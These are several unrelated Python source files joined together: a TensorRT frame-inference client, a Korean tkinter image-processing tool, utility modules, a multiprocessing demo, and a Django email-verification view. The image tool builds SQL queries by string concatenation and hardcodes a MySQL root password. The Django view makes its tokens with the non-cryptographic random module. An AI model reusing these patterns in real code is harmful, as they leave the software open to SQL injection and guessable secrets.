self.frame_id_tq.put(frm_id)
self.frames_processed += 1
elapsed = (time.time() - time0)
in_mb=[]
in_id =[] ## can be used to resent to the ImageJ
for i in range(self.max_batch_size):
_f = self.processed_tq.get()
_id = self.frame_id_tq.get()
in_mb.append(_f)
in_id.append(_id)
self.processed_tq.task_done()
self.frame_id_tq.task_done()
in_mb = np.array(in_mb)
in_id = np.array(in_id)
if (len(in_mb)==self.max_batch_size):
#print("entered for inference")
trt_outputs1, times = self.trt_inference_wrapper.infer(in_mb)
trt_outputs = np.asarray(trt_outputs1[0])
print(trt_outputs.shape)
print("Execution Times ", times)
#for _ in in_id:
self.server.update(self.channel_name, self.frame_producer(frm_id, trt_outputs1[0]))
print("Sent frame id", frm_id)
self.avg_times+=(time.time()-time0)
print("Average time ",(time.time()-time0))
def monitor(self, pv):
uid = pv['uniqueId']
# ignore the 1st empty frame when use sv simulator
if self.recv_frames is None:
self.recv_frames = 0
return
if self.base_seq_id is None: self.base_seq_id = uid
self.recv_frames += 1
self.frame_tq.put(pv.copy())
logging.info("[%.3f] received frame %d, total frame received: %d, should have received: %d; %d frames pending process" % (\
time.time(), uid, self.recv_frames, uid - self.base_seq_id + 1, self.frame_tq.qsize()))
#def main_monitor(ch, nth, pv_request):
# give threads seconds to exit
#c.stopMonitor()
#c.unsubscribe('monitor')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='')
parser.add_argument('-gpus', type=str, default="0", help='list of visiable GPUs')
parser.add_argument('-cn', type=str, default='QMPX3:test', help='pva channel name')
parser.add_argument('-qs', type=int, default=10000, help='queue size')
parser.add_argument('-nth', type=int, default=1, help='number of threads for frame processes')
parser.add_argument('-terminal', type=int, default=0, help='non-zero to print logs to stdout')
#parser.add_argument('-sf', type=int, default=0, help='specifies how many frames to skip')
args, unparsed = parser.parse_known_args()
if len(unparsed) > 0:
print('Unrecognized argument(s): \n%s \nProgram exiting ... ... ' % '\n'.join(unparsed))
exit(0)
if len(args.gpus) > 0:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus
logging.basicConfig(filename='edgePtyhcoNN.log', level=logging.DEBUG,\
format='%(asctime)s %(levelname)-8s %(message)s',)
if args.terminal != 0:
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
c = Channel(args.cn)
client = pvaClient(args.nth)
c.setMonitorMaxQueueLength(args.qs)
time.sleep(1)
pv_request = ''
c.monitor(client.monitor, pv_request)
time.sleep(1)
client.frame_tq.join()
client.processed_tq.join()
client.frame_id_tq.join()
#client.thr_exit = 1
time.sleep(10000)
trt_inference_wrapper.destroy()
c.stopMonitor()
|
Day12-02.py | ## 영상 처리 및 데이터 분석 툴
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
## 함수 선언부
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = os.path.getsize(fname) # 파일 크기 확인
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'rb') # 파일 열기(바이너리 모드)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
loadImage(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 기존에 캐버스 있으면 뜯어내기.
if canvas != None :
canvas.destroy()
# 화면 준비 (고정됨)
VIEW_X, VIEW_Y = 256, 256
if VIEW_X >= outW or VIEW_Y >= outH : # 영상이 128미만이면
VIEW_X = outW
VIEW_Y = outH
step = 1 # 건너뛸숫자
else :
step = int(outW / VIEW_X)
window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
canvas.create_image((VIEW_X/2, VIEW_X/2), image=paper, state='normal')
# 화면에 출력
def putPixel() :
for i in range(0, outH,step) :
for k in range(0, outW,step) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data),
( int(k/step),int(i/step)))
threading.Thread(target=putPixel).start()
canvas.pack(expand=1, anchor =CENTER)
status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH) )
def equal() : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
def addImage() : # 밝게하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def a_average() : # 입출력 영상의 평균값
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
rawSum = 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
subWindow = Toplevel(window) # 부모(window)에 종속된 서브윈도
subWindow.geometry('200x100')
label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg) ); label1.pack()
label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg)); label2.pack()
subWindow.mainloop()
def a_histogram() : # 히스토 그램
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0] * 256; normalList = [0] * 256
for i in range(outH) :
for k in range(outW) :
value = outImage[i][k]
countList[value] += 1
# 정규화된값 = (카운트값 - 최소값) * High / (최대값 - 최소값)
maxVal = max (countList); minVal = min(countList)
for i in range(len(countList)) :
normalList[i] = (countList[i] - minVal) * 256 / (maxVal - minVal)
# 화면 출력
subWindow = Toplevel(window)
subWindow.geometry('256x256')
subCanvas = Canvas(subWindow, width=256, height=256)
subPaper = PhotoImage(width=256, height=256)
subCanvas.create_image((256/2,256/2), image=subPaper, state='normal')
for i in range(0, 256) :
for k in range(0, int(normalList[i])) :
data = 0
subPaper.put('#%02x%02x%02x' % (data, data, data), (i, 255-k))
subCanvas.pack(expand=1, anchor=CENTER)
subWindow.mainloop()
import matplotlib.pyplot as plt
def a_histogram2() : # 히스토 그램
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0] * 256
for i in range(outH) :
for k in range(outW) :
value = outImage[i][k]
countList[value] += 1
plt.plot(countList)
plt.show()
def upDown() : # 상하 반전 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[outW-1-i][k] = inImage[i][k]
display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # 축소하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
for i in range(outW):
for k in range(outH):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
import csv
def saveCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Column', 'Row', 'Value']
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outW):
for col in range(outH):
data = outImage[row][col]
row_list = [row, col, data]
csvWriter.writerow(row_list)
print('OK!')
def saveShuffleCSV() :
pass
def loadCSV(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = -1
fp = open(fname, 'r')
for f in fp :
fsize += 1
fp.close()
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'r') # 파일 열기(바이너리 모드)
csvFP = csv.reader(fp)
next(csvFP)
for row_list in csvFP :
row= int(row_list[0]) ; col = int(row_list[1]) ; value=int(row_list[2])
inImage[row][col] = value
fp.close()
def openCSV() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
loadCSV(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import sqlite3
def saveSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(inW) + \
"," + str(i) + "," + str(k) + "," + str(inImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok!')
def openSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # ['강아지:128', '강아지:512' ....]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openSQLite")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openSQLite")
import pymysql
def saveMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
try:
sql = "DELETE FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + str(outW)
cur.execute(sql)
con.commit()
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) + \
"," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok! saveMySQL')
def openMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # ['강아지:128', '강아지:512' ....]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openMySQL")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openMySQL")
import xlwt
def saveExcel1() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xls", filetypes=(("XLS파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlwt.Workbook()
ws = wb.add_sheet(sheetName)
for rowNum in range(outH):
for colNum in range(outW):
data = outImage[rowNum][colNum]
ws.write(rowNum, colNum, data)
wb.save(output_file)
print('OK! saveExcel1')
import xlsxwriter
def saveExcel2() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xlsx", filetypes=(("XLSX파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlsxwriter.Workbook(output_file)
ws = wb.add_worksheet(sheetName)
ws.set_column(0, outW, 1.0) # 약 0.34 쯤
for r in range(outH):
ws.set_row(r, 9.5) # 약 0.35 쯤
for rowNum in range(outW) :
for colNum in range(outH) :
data = outImage[rowNum][colNum]
# data 값으로 셀의 배경색을 조절 #000000~#FFFFFF
if data > 15 :
hexStr = '#' + (hex(data)[2:])*3
else :
hexStr = '#' + ('0' + hex(data)[2:]) * 3
# 셀의 포맷을 준비
cell_format = wb.add_format()
cell_format.set_bg_color(hexStr)
ws.write(rowNum, colNum, '', cell_format)
wb.close()
print('OK! saveExcel2')
def a_histoStretch() : # 히스토그램 스트래칭 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
maxVal, minVal, HIGH = 0, 255, 255
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal :
maxVal = data
if data < minVal :
minVal = data
# 히스토그램 스트래칭
# OUT = (IN - 최소값) * HIGH / (최대값 - 최소값)
for i in range(inH) :
for k in range(inW) :
value = int( (inImage[i][k] - minVal) * HIGH / ( maxVal - minVal) )
if value < 0 :
value = 0
elif value > 255 :
value = 255
outImage[i][k] = value
display()
def a_endInSearch() : # 엔드-인 탐색 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
maxVal, minVal, HIGH = 0, 255, 255
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal :
maxVal = data
if data < minVal :
minVal = data
limit = askinteger('엔드인', '상하 범위:', minvalue=1, maxvalue=127)
maxVal -= limit
minVal += limit
# 히스토그램 스트래칭
# OUT = (IN - 최소값) * HIGH / (최대값 - 최소값)
for i in range(inH) :
for k in range(inW) :
value = int( (inImage[i][k] - minVal) * HIGH / ( maxVal - minVal) )
if value < 0 :
value = 0
elif value > 255 :
value = 255
outImage[i][k] = value
display()
def a_histoEqual() : # 히스토그램 평활화 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
histo = [0] * 255; sumHisto = [0] * 255; normalHisto=[0] * 255
HIGH = 255
# 히스토그램 작성
for i in range(inH) :
for k in range(inW) :
value = inImage[i][k]
histo[value] += 1
# 누적 히스토그램 작성
sVal = 0
for i in range(len(histo)) :
sVal += histo[i]
sumHisto[i] = sVal
# 정규화된 누적 히스토그램 : (누적합 / (행개수*열개수)) * HIGH
for i in range(len(sumHisto)) :
normalHisto[i] = int(sumHisto[i] / (outW * outH) * HIGH)
# 정규화된 값으로 출력하기
for i in range(inH) :
for k in range(inW) :
index = inImage[i][k]
outImage[i][k] = normalHisto[index]
display()
## 전역 변수부
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
VIEW_X, VIEW_Y = 128, 128
status = None
## 메인 코드부
window = Tk(); window.geometry('400x400');
window.title('영상 처리&데이터 분석 Ver 0.91')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
status = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=a_average)
analyzeMenu.add_command(label='히스토그램', command=a_histogram)
analyzeMenu.add_command(label='히스토그램(matplotlib)', command=a_histogram2)
analyzeMenu.add_separator()
analyzeMenu.add_command(label='히스토그램 스트래칭', command=a_histoStretch)
analyzeMenu.add_command(label='엔드-인 탐색', command=a_endInSearch)
analyzeMenu.add_command(label='히스토그램 평활화', command=a_histoEqual)
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='다른 포맷 처리', menu=otherMenu)
otherMenu.add_command(label='CSV로 내보내기', command=saveCSV)
otherMenu.add_command(label='CSV(셔플)로 내보내기', command=saveShuffleCSV)
otherMenu.add_command(label='CSV 불러오기', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='SQLite로 내보내기', command=saveSQLite)
otherMenu.add_command(label='SQLite에서 가져오기', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='MySQL로 내보내기', command=saveMySQL)
otherMenu.add_command(label='MySQL에서 가져오기', command=openMySQL)
otherMenu.add_separator()
otherMenu.add_command(label='Excel로 내보내기(숫자)', command=saveExcel1)
otherMenu.add_command(label='Excel로 내보내기(음영)', command=saveExcel2)
window.mainloop() |
static.py | import zipfile
import datetime
from threading import Thread
from utility.setting import openapi_path
def thread_decorator(func):
def wrapper(*args):
Thread(target=func, args=args, daemon=True).start()
return wrapper
def now():
return datetime.datetime.now()
def timedelta_sec(second, std_time=None):
if std_time is None:
next_time = now() + datetime.timedelta(seconds=second)
else:
next_time = std_time + datetime.timedelta(seconds=second)
return next_time
def timedelta_hour(hour, std_time=None):
if std_time is None:
next_time = now() + datetime.timedelta(hours=hour)
else:
next_time = std_time + datetime.timedelta(hours=hour)
return next_time
def timedelta_day(day, std_time=None):
if std_time is None:
next_time = now() + datetime.timedelta(days=day)
else:
next_time = std_time + datetime.timedelta(days=day)
return next_time
def strp_time(timetype, str_time):
return datetime.datetime.strptime(str_time, timetype)
def strf_time(timetype, std_time=None):
if std_time is None:
str_time = now().strftime(timetype)
else:
str_time = std_time.strftime(timetype)
return str_time
def changeFormat(text):
text = str(text)
try:
format_data = format(int(text), ',')
except ValueError:
format_data = format(float(text), ',')
if len(format_data.split('.')) >= 2 and len(format_data.split('.')[1]) == 1:
format_data += '0'
return format_data
def readEnc(trcode):
enc = zipfile.ZipFile(f'{openapi_path}/data/{trcode}.enc')
lines = enc.read(trcode.upper() + '.dat').decode('cp949')
return lines
def parseDat(trcode, lines):
lines = lines.split('\n')
start = [i for i, x in enumerate(lines) if x.startswith('@START')]
end = [i for i, x in enumerate(lines) if x.startswith('@END')]
block = zip(start, end)
enc_data = {'trcode': trcode, 'input': [], 'output': []}
for start, end in block:
block_data = lines[start - 1:end + 1]
block_info = block_data[0]
block_type = 'input' if 'INPUT' in block_info else 'output'
record_line = block_data[1]
tokens = record_line.split('_')[1].strip()
record = tokens.split('=')[0]
fields = block_data[2:-1]
field_name = []
for line in fields:
field = line.split('=')[0].strip()
field_name.append(field)
fields = {record: field_name}
enc_data['input'].append(fields) if block_type == 'input' else enc_data['output'].append(fields)
return enc_data
|
multipro.py | from multiprocessing import Process
import time
def sub1(txt):
for i in range(30):
time.sleep(1)
print(txt, i)
del(i)
def main(p):
for j in range(4):
time.sleep(2)
print('main', j)
del(j)
if p.is_alive():
p.terminate()
time.sleep(0.1)
print("beep terminated.")
else:
print("beep finished.")
if __name__ == '__main__':
p = Process(target=sub1, args=("beep",))
p.start()
main(p)
print('Main finished.')
''' Процессы можно создавать из обычных функций. Методы работы с процессами
почти все те же самые, что и для потоков из модуля threading. А вот для
синхронизации процессов и обмена данными принято использовать другие
инструменты. Речь идет об очередях (Queue) и каналах (Pipe).
Впрочем, аналоги локов, событий и семафоров, которые были в threading, здесь
тоже есть. Кроме того в модуле multiprocessing есть механизм работы с общей
памятью. Для этого в модуле есть классы переменной (Value) и массива (Array),
которые можно “обобщать” (share) между процессами. Для удобства работы с
общими переменными можно использовать классы-менеджеры (Manager). Они более
гибкие и удобные в обращении, однако более медленные. Нельзя не отметить
приятную возможность делать общими типы из модуля ctypes с помощью модуля
multiprocessing.sharedctypes.
Еще в модуле multiprocessing есть механизм создания пулов процессов. Этот
механизм очень удобно использовать для реализации шаблона Master-Worker или
для реализации параллельного Map (который в некотором смысле является частным
случаем Master-Worker).'''
|
Confirm.py | from http import HTTPStatus
from rest_framework.decorators import api_view,authentication_classes,throttle_classes
from rest_framework.throttling import UserRateThrottle,AnonRateThrottle
from datetime import datetime as dt
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from hashlib import sha224
from random import randint, shuffle
from smtplib import SMTP
from threading import Thread
from django.core.mail import EmailMessage
from datetime import timedelta
from django.utils import timezone
from django.http import HttpResponse
from django.conf import settings
from django.contrib.auth import get_user_model
from django.shortcuts import render
from django.template.loader import render_to_string
from django.urls import get_resolver
from .errors import InvalidUserModel, EmailTemplateNotFound
from .errors import NotAllFieldCompiled
from rest_framework.authentication import BasicAuthentication
# Create your views here.
@api_view(['GET', 'POST'])
@throttle_classes([UserRateThrottle,AnonRateThrottle])
@authentication_classes([BasicAuthentication])
def verify(request, email_token,token_type):
try:
#template = settings.EMAIL_PAGE_TEMPLATE
#return render(request, template, {'success': verifyToken(email_token)})
user=verifyToken(email_token,token_type)
if user is not None:
if token_type=='U_V':
user.verified = True
user.save()
return HttpResponse('{"detail":"verified","message":"token verified"}', status=HTTPStatus.ACCEPTED,content_type='application/json')
elif token_type=='P_R' and request.method == 'POST':
if request.data['password'] is not None:
user.set_password(request.data['password'])
user.save()
return HttpResponse('{"detail":"password updated","message":"password updated try logging-in"}',status=HTTPStatus.OK,content_type='application/json')
else:
return HttpResponse('{"detail":"not verified","message":"token verified failed/invalid token"}',status=HTTPStatus.FORBIDDEN,content_type='application/json')
except AttributeError:
raise NotAllFieldCompiled('EMAIL_PAGE_TEMPLATE field not found')
def sendConfirm(user, token_type, **kwargs):
from .models import Token
try:
email = user.email
if token_type=='U_V':
user.verified = False
user.save()
try:
token = kwargs['token']
except KeyError:
alpha = [c for c in 'abcdefghijklmnopqrstuwxyz']
shuffle(alpha)
word = ''.join([a for a in alpha if randint(0, 1) == 1])
token = str(sha224(bytes(email + str(dt.now()) + str(randint(1000, 9999)) + word, 'utf-8')).hexdigest())
try:
user_email=Token.objects.get(user=user,token_type=token_type)
is_token_active=user_email.is_token_active()
if is_token_active :
token=user_email.token
else:
user_email.delete()
user_email = Token.objects.create(user=user, token=token,token_type=token_type)
user_email.save()
except Token.DoesNotExist:
user_email = Token.objects.create(user=user, token=token,token_type=token_type)
user_email.save()
pass
#user_email = User.objects.create(user=user, email_token=token,token_type=token_type)
t = Thread(target=sendConfirm_thread, args=(email, token,token_type))
t.start()
except AttributeError:
raise InvalidUserModel('The user model you provided is invalid')
def sendConfirm_thread(email, token,token_type):
try:
sender = settings.EMAIL_SERVER
link = settings.EMAIL_USER_VERIFICATION_LINK
subject = settings.EMAIL_MAIL_SUBJECT
address = settings.EMAIL_ADDRESS
port = settings.EMAIL_PORT
password = settings.EMAIL_PASSWORD
except AttributeError:
raise NotAllFieldCompiled('Compile all the fields in the settings')
link=link+token_type+"/"+token
try:
html = settings.USER_VERIFICATION_HTML_TEMPLATE[token_type]
html = render_to_string(html, {'link': link})
msg = EmailMessage(subject, html,address, email.split(","))
msg.content_subtype = "html" # Main content is now text/html
msg.send()
except AttributeError:
pass
def verifyToken(email_token,token_type):
from .models import Token
try:
user_email = Token.objects.get(token=email_token,token_type=token_type)
if user_email.is_token_active():
user = get_user_model().objects.get(email=user_email.user.email)
user_email.delete()
return user
else:
return None
except Token.DoesNotExist:
return None
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long,too-many-lines
import os
import time
from OpenSSL import crypto
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
